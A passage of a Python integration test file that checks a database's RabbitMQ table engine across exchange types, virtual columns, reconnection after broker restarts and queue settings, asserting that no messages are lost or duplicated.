DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables = 5
for consumer_id in range(num_tables):
print(("Setting up table {}".format(consumer_id)))
instance.query('''
DROP TABLE IF EXISTS test.fanout_exchange_{0};
DROP TABLE IF EXISTS test.fanout_exchange_{0}_mv;
CREATE TABLE test.fanout_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 2,
rabbitmq_num_queues = 2,
rabbitmq_routing_key_list = 'key_{0}',
rabbitmq_exchange_name = 'fanout_exchange_testing',
rabbitmq_exchange_type = 'fanout',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.fanout_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.fanout_exchange_{0};
'''.format(consumer_id))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
for msg_id in range(messages_num):
channel.basic_publish(exchange='fanout_exchange_testing', routing_key='',
properties=pika.BasicProperties(message_id=str(msg_id)), body=messages[msg_id])
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables:
break
for consumer_id in range(num_tables):
instance.query('''
DROP TABLE test.fanout_exchange_{0}_mv;
DROP TABLE test.fanout_exchange_{0};
'''.format(consumer_id))
instance.query('''
DROP TABLE test.destination;
''')
assert int(result) == messages_num * num_tables, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_topic_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables = 5
for consumer_id in range(num_tables):
print(("Setting up table {}".format(consumer_id)))
instance.query('''
DROP TABLE IF EXISTS test.topic_exchange_{0};
DROP TABLE IF EXISTS test.topic_exchange_{0}_mv;
CREATE TABLE test.topic_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 2,
rabbitmq_num_queues = 2,
rabbitmq_exchange_name = 'topic_exchange_testing',
rabbitmq_exchange_type = 'topic',
rabbitmq_routing_key_list = '*.{0}',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.topic_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.topic_exchange_{0};
'''.format(consumer_id))
for consumer_id in range(num_tables):
print(("Setting up table {}".format(num_tables + consumer_id)))
instance.query('''
DROP TABLE IF EXISTS test.topic_exchange_{0};
DROP TABLE IF EXISTS test.topic_exchange_{0}_mv;
CREATE TABLE test.topic_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 2,
rabbitmq_num_queues = 2,
rabbitmq_exchange_name = 'topic_exchange_testing',
rabbitmq_exchange_type = 'topic',
rabbitmq_routing_key_list = '*.logs',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.topic_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.topic_exchange_{0};
'''.format(num_tables + consumer_id))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
key_num = 0
for num in range(num_tables):
key = "topic." + str(key_num)
key_num += 1
for message in messages:
channel.basic_publish(exchange='topic_exchange_testing', routing_key=key, body=message)
key = "random.logs"
current = 0
for msg_id in range(messages_num):
channel.basic_publish(exchange='topic_exchange_testing', routing_key=key,
properties=pika.BasicProperties(message_id=str(msg_id)), body=messages[msg_id])
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables + messages_num * num_tables:
break
for consumer_id in range(num_tables * 2):
instance.query('''
DROP TABLE test.topic_exchange_{0}_mv;
DROP TABLE test.topic_exchange_{0};
'''.format(consumer_id))
instance.query('''
DROP TABLE test.destination;
''')
assert int(
result) == messages_num * num_tables + messages_num * num_tables, 'ClickHouse lost some messages: {}'.format(
result)
def test_rabbitmq_hash_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64, channel_id String)
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables = 4
for consumer_id in range(num_tables):
table_name = 'rabbitmq_consumer{}'.format(consumer_id)
print(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 4,
rabbitmq_num_queues = 2,
rabbitmq_exchange_type = 'consistent_hash',
rabbitmq_exchange_name = 'hash_exchange_testing',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT key, value, _channel_id AS channel_id FROM test.{0};
'''.format(table_name))
i = [0]
messages_num = 500
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
def produce():
# init connection here because otherwise python rabbitmq client might fail
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
for msg_id in range(messages_num):
channel.basic_publish(exchange='hash_exchange_testing', routing_key=str(msg_id),
properties=pika.BasicProperties(message_id=str(msg_id)), body=messages[msg_id])
connection.close()
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
result1 = ''
while True:
result1 = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT channel_id) FROM test.destination")
for consumer_id in range(num_tables):
table_name = 'rabbitmq_consumer{}'.format(consumer_id)
instance.query('''
DROP TABLE test.{0}_mv;
DROP TABLE test.{0};
'''.format(table_name))
instance.query('''
DROP TABLE test.destination;
''')
for thread in threads:
thread.join()
assert int(result1) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
assert int(result2) == 4 * num_tables
def test_rabbitmq_multiple_bindings(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
DROP TABLE IF EXISTS test.bindings;
DROP TABLE IF EXISTS test.bindings_mv;
CREATE TABLE test.bindings (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'multiple_bindings_testing',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'key1,key2,key3,key4,key5',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.bindings_mv TO test.destination AS
SELECT * FROM test.bindings;
''')
i = [0]
messages_num = 500
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
def produce():
# init connection here because otherwise python rabbitmq client might fail
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
keys = ['key1', 'key2', 'key3', 'key4', 'key5']
for key in keys:
for message in messages:
channel.basic_publish(exchange='multiple_bindings_testing', routing_key=key, body=message)
connection.close()
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * threads_num * 5:
break
for thread in threads:
thread.join()
instance.query('''
DROP TABLE test.bindings;
DROP TABLE test.bindings_mv;
DROP TABLE test.destination;
''')
assert int(result) == messages_num * threads_num * 5, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_headers_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables_to_receive = 2
for consumer_id in range(num_tables_to_receive):
print(("Setting up table {}".format(consumer_id)))
instance.query('''
DROP TABLE IF EXISTS test.headers_exchange_{0};
DROP TABLE IF EXISTS test.headers_exchange_{0}_mv;
CREATE TABLE test.headers_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 2,
rabbitmq_exchange_name = 'headers_exchange_testing',
rabbitmq_exchange_type = 'headers',
rabbitmq_routing_key_list = 'x-match=all,format=logs,type=report,year=2020',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.headers_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.headers_exchange_{0};
'''.format(consumer_id))
num_tables_to_ignore = 2
for consumer_id in range(num_tables_to_ignore):
print(("Setting up table {}".format(consumer_id + num_tables_to_receive)))
instance.query('''
DROP TABLE IF EXISTS test.headers_exchange_{0};
DROP TABLE IF EXISTS test.headers_exchange_{0}_mv;
CREATE TABLE test.headers_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'headers_exchange_testing',
rabbitmq_exchange_type = 'headers',
rabbitmq_routing_key_list = 'x-match=all,format=logs,type=report,year=2019',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.headers_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.headers_exchange_{0};
'''.format(consumer_id + num_tables_to_receive))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
fields = {}
fields['format'] = 'logs'
fields['type'] = 'report'
fields['year'] = '2020'
for msg_id in range(messages_num):
channel.basic_publish(exchange='headers_exchange_testing', routing_key='',
properties=pika.BasicProperties(headers=fields, message_id=str(msg_id)),
body=messages[msg_id])
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables_to_receive:
break
for consumer_id in range(num_tables_to_receive + num_tables_to_ignore):
instance.query('''
DROP TABLE test.headers_exchange_{0}_mv;
DROP TABLE test.headers_exchange_{0};
'''.format(consumer_id))
instance.query('''
DROP TABLE test.destination;
''')
assert int(result) == messages_num * num_tables_to_receive, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_virtual_columns(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
CREATE TABLE test.rabbitmq_virtuals (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'virtuals',
rabbitmq_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, key, _exchange_name, _channel_id, _delivery_tag, _redelivered FROM test.rabbitmq_virtuals;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
message_num = 10
i = 0
messages = []
for _ in range(message_num):
messages.append(json.dumps({'key': i, 'value': i}))
i += 1
for message in messages:
channel.basic_publish(exchange='virtuals', routing_key='', body=message)
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == message_num:
break
connection.close()
result = instance.query('''
SELECT key, value, _exchange_name, SUBSTRING(_channel_id, 1, 3), _delivery_tag, _redelivered
FROM test.view ORDER BY key
''')
expected = '''\
0 0 virtuals 1_0 1 0
1 1 virtuals 1_0 2 0
2 2 virtuals 1_0 3 0
3 3 virtuals 1_0 4 0
4 4 virtuals 1_0 5 0
5 5 virtuals 1_0 6 0
6 6 virtuals 1_0 7 0
7 7 virtuals 1_0 8 0
8 8 virtuals 1_0 9 0
9 9 virtuals 1_0 10 0
'''
instance.query('''
DROP TABLE test.rabbitmq_virtuals;
DROP TABLE test.view;
''')
assert TSV(result) == TSV(expected)
def test_rabbitmq_virtual_columns_with_materialized_view(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq_virtuals_mv (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'virtuals_mv',
rabbitmq_format = 'JSONEachRow';
CREATE TABLE test.view (key UInt64, value UInt64,
exchange_name String, channel_id String, delivery_tag UInt64, redelivered UInt8) ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _exchange_name as exchange_name, _channel_id as channel_id, _delivery_tag as delivery_tag, _redelivered as redelivered
FROM test.rabbitmq_virtuals_mv;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
message_num = 10
i = 0
messages = []
for _ in range(message_num):
messages.append(json.dumps({'key': i, 'value': i}))
i += 1
for message in messages:
channel.basic_publish(exchange='virtuals_mv', routing_key='', body=message)
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == message_num:
break
connection.close()
result = instance.query(
"SELECT key, value, exchange_name, SUBSTRING(channel_id, 1, 3), delivery_tag, redelivered FROM test.view ORDER BY delivery_tag")
expected = '''\
0 0 virtuals_mv 1_0 1 0
1 1 virtuals_mv 1_0 2 0
2 2 virtuals_mv 1_0 3 0
3 3 virtuals_mv 1_0 4 0
4 4 virtuals_mv 1_0 5 0
5 5 virtuals_mv 1_0 6 0
6 6 virtuals_mv 1_0 7 0
7 7 virtuals_mv 1_0 8 0
8 8 virtuals_mv 1_0 9 0
9 9 virtuals_mv 1_0 10 0
'''
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
DROP TABLE test.rabbitmq_virtuals_mv
''')
assert TSV(result) == TSV(expected)
def test_rabbitmq_many_consumers_to_each_queue(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64, channel_id String)
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables = 4
for table_id in range(num_tables):
print(("Setting up table {}".format(table_id)))
instance.query('''
DROP TABLE IF EXISTS test.many_consumers_{0};
DROP TABLE IF EXISTS test.many_consumers_{0}_mv;
CREATE TABLE test.many_consumers_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'many_consumers',
rabbitmq_num_queues = 2,
rabbitmq_num_consumers = 2,
rabbitmq_queue_base = 'many_consumers',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.many_consumers_{0}_mv TO test.destination AS
SELECT key, value, _channel_id as channel_id FROM test.many_consumers_{0};
'''.format(table_id))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
for msg_id in range(messages_num):
channel.basic_publish(exchange='many_consumers', routing_key='',
properties=pika.BasicProperties(message_id=str(msg_id)), body=messages[msg_id])
connection.close()
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
result1 = ''
while True:
result1 = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT channel_id) FROM test.destination")
for thread in threads:
thread.join()
for consumer_id in range(num_tables):
instance.query('''
DROP TABLE test.many_consumers_{0};
DROP TABLE test.many_consumers_{0}_mv;
'''.format(consumer_id))
instance.query('''
DROP TABLE test.destination;
''')
assert int(result1) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
# 4 tables, 2 consumers for each table => 8 consumer tags
assert int(result2) == 8
def test_rabbitmq_restore_failed_connection_without_losses_1(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.consume;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE TABLE test.consume (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'producer_reconnect',
rabbitmq_format = 'JSONEachRow',
rabbitmq_num_consumers = 2,
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.consume;
DROP TABLE IF EXISTS test.producer_reconnect;
CREATE TABLE test.producer_reconnect (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'producer_reconnect',
rabbitmq_persistent = '1',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages_num = 100000
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.producer_reconnect VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(0.1)
kill_rabbitmq(rabbitmq_cluster.rabbitmq_docker_id)
time.sleep(4)
revive_rabbitmq(rabbitmq_cluster.rabbitmq_docker_id)
while True:
result = instance.query('SELECT count(DISTINCT key) FROM test.view')
time.sleep(1)
if int(result) == messages_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
DROP TABLE test.consume;
DROP TABLE test.producer_reconnect;
''')
assert int(result) == messages_num, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_restore_failed_connection_without_losses_2(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.consumer_reconnect (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'consumer_reconnect',
rabbitmq_num_consumers = 10,
rabbitmq_num_queues = 10,
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
''')
i = 0
messages_num = 150000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i, 'value': i}))
i += 1
for msg_id in range(messages_num):
channel.basic_publish(exchange='consumer_reconnect', routing_key='', body=messages[msg_id],
properties=pika.BasicProperties(delivery_mode=2, message_id=str(msg_id)))
connection.close()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.consumer_reconnect;
''')
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(0.1)
kill_rabbitmq(rabbitmq_cluster.rabbitmq_docker_id)
time.sleep(8)
revive_rabbitmq(rabbitmq_cluster.rabbitmq_docker_id)
# while int(instance.query('SELECT count() FROM test.view')) == 0:
# time.sleep(0.1)
# kill_rabbitmq()
# time.sleep(2)
# revive_rabbitmq()
while True:
result = instance.query('SELECT count(DISTINCT key) FROM test.view')
time.sleep(1)
if int(result) == messages_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.consumer_reconnect;
''')
assert int(result) == messages_num, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_commit_on_block_write(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'block',
rabbitmq_format = 'JSONEachRow',
rabbitmq_queue_base = 'block',
rabbitmq_max_block_size = 100,
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
for message in messages:
channel.basic_publish(exchange='block', routing_key='', body=message)
rabbitmq_thread = threading.Thread(target=produce)
rabbitmq_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('DETACH TABLE test.rabbitmq;')
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='rabbitmq'")) == 1:
time.sleep(1)
instance.query('ATTACH TABLE test.rabbitmq;')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
rabbitmq_thread.join()
connection.close()
assert result == 1, 'Messages from RabbitMQ get duplicated!'
def test_rabbitmq_no_connection_at_startup(rabbitmq_cluster):
# no connection when table is initialized
rabbitmq_cluster.pause_container('rabbitmq1')
instance.query('''
CREATE TABLE test.cs (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'cs',
rabbitmq_format = 'JSONEachRow',
rabbitmq_num_consumers = '5',
rabbitmq_row_delimiter = '\\n';
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.cs;
''')
time.sleep(5)
rabbitmq_cluster.unpause_container('rabbitmq1')
# need to make sure rabbit table made all rabbit setup
time.sleep(10)
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
for i in range(messages_num):
message = json.dumps({'key': i, 'value': i})
channel.basic_publish(exchange='cs', routing_key='', body=message,
properties=pika.BasicProperties(delivery_mode=2, message_id=str(i)))
connection.close()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.cs;
''')
assert int(result) == messages_num, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_format_factory_settings(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.format_settings (
id String, date DateTime
) ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'format_settings',
rabbitmq_format = 'JSONEachRow',
date_time_input_format = 'best_effort';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
message = json.dumps({"id":"format_settings_test","date":"2021-01-19T14:42:33.1829214Z"})
expected = instance.query('''SELECT parseDateTimeBestEffort(CAST('2021-01-19T14:42:33.1829214Z', 'String'))''')
channel.basic_publish(exchange='format_settings', routing_key='', body=message)
result = ''
while True:
result = instance.query('SELECT date FROM test.format_settings')
if result == expected:
break;
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (
id String, date DateTime
) ENGINE = MergeTree ORDER BY id;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.format_settings;
''')
channel.basic_publish(exchange='format_settings', routing_key='', body=message)
result = ''
while True:
result = instance.query('SELECT date FROM test.view')
if result == expected:
break;
connection.close()
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.format_settings;
''')
assert(result == expected)
def test_rabbitmq_vhost(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq_vhost (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'vhost',
rabbitmq_format = 'JSONEachRow',
rabbitmq_vhost = '/'
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.basic_publish(exchange='vhost', routing_key='', body=json.dumps({'key': 1, 'value': 2}))
connection.close()
while True:
result = instance.query('SELECT * FROM test.rabbitmq_vhost ORDER BY key', ignore_error=True)
if result == "1\t2\n":
break
def test_rabbitmq_drop_table_properly(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq_drop (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'drop',
rabbitmq_format = 'JSONEachRow',
rabbitmq_queue_base = 'rabbit_queue_drop'
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.basic_publish(exchange='drop', routing_key='', body=json.dumps({'key': 1, 'value': 2}))
while True:
result = instance.query('SELECT * FROM test.rabbitmq_drop ORDER BY key', ignore_error=True)
if result == "1\t2\n":
break
exists = channel.queue_declare(queue='rabbit_queue_drop', passive=True)
assert(exists)
instance.query("DROP TABLE test.rabbitmq_drop")
time.sleep(30)
try:
exists = channel.queue_declare(callback, queue='rabbit_queue_drop', passive=True)
except Exception as e:
exists = False
assert(not exists)
def test_rabbitmq_queue_settings(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq_settings (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'rabbit_exchange',
rabbitmq_format = 'JSONEachRow',
rabbitmq_queue_base = 'rabbit_queue_settings',
rabbitmq_queue_settings_list = 'x-max-length=10,x-overflow=reject-publish'
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
for i in range(50):
channel.basic_publish(exchange='rabbit_exchange', routing_key='', body=json.dumps({'key': 1, 'value': 2}))
connection.close()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq_settings;
''')
time.sleep(5)
